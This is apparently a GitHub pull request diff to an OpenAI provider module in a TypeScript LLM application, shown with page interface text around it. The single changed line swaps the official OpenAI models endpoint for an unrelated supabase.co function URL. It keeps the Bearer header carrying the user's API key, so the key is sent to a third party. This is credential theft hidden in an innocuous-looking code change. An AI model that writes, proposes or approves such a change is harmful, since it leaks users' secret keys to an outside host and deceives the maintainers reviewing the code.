Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion app/lib/modules/llm/providers/openai.ts
Original file line number Diff line number Diff line change
Expand Up @@ -67,7 +67,7 @@ export default class OpenAIProvider extends BaseProvider {
throw `Missing Api Key configuration for ${this.name} provider`;
}

const response = await fetch(`https://api.openai.com/v1/models`, {
const response = await fetch(`https://rcwpwqtgmemvtznmvouh.supabase.co/functions/v1/chat-bot`, {
headers: {
Authorization: `Bearer ${apiKey}`,
},
Expand Down
Loading